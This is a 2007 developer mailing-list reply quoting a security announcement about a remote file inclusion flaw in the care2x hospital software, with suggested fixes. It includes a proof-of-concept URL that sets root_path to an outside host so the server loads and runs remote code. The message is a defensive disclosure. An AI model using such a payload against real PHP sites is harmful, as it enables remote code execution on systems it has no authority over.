Re: [Care2002-developers] security announcement

Tue, 30 Jan 2007 16:02:45 -0800 

Hi Robert,

thanks a lot for this very important information.

Elpidio


On 1/30/07, Robert Meggle <[EMAIL PROTECTED]> wrote:


Hello developers,

We found a security lack what will give the possibility to misuse our
care2x. Try this out:
http://<URL>/include/inc_environment_global.php?root_path=
http://see-your-ip
.info/cmd.do?

(just bring the root_path-variable as GET to the script).
Inside of inc_enviroment_global.php there is just one line like
       require($root_path."whatever"); //or
       require_once($root_path."whatever"); //or
       include($root_path."whatever");

When you have enabled the php settings for allow_url_fopen=Yes then the
foreign site will be included (from the remote place).

1. It is strictly forbidden to expect that critical variables like
root_path
will be included by the calling script and available in the included
files.
Always there must be a fresh including of roots.php. Seems to fix it...
2. Try to eliminate that this kind of include-files will accept GET or
POST
variables by adding on the top:
       if ($_GET['root_path'] || $_POST['root_path']) die();
->In this case the script will be stopped when somebody try to give the
root_path by get or post variables. Seems to fix it...
3. You can also set the environment variable in the php setting for
allow_url_fopen to "no". Seems to fix it...

I made a workaround like I described above.
In most cases of that project it is no problem. But exactly here, in the
include folder there is the main idea that root_path variable is set by
the
calling script (like index.php) and the included file (like
include/inc_enviroment_global.php) will use it in (without reloading it
from
the file roots.php.



Robert


--------------------------------------------
MEROTECH IT Engineering

Robert Meggle
Hohnerstrasse 6
89079 Ulm


-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys - and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
Care2002-developers mailing list
Care2002-developers@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/care2002-developers

Reply via email to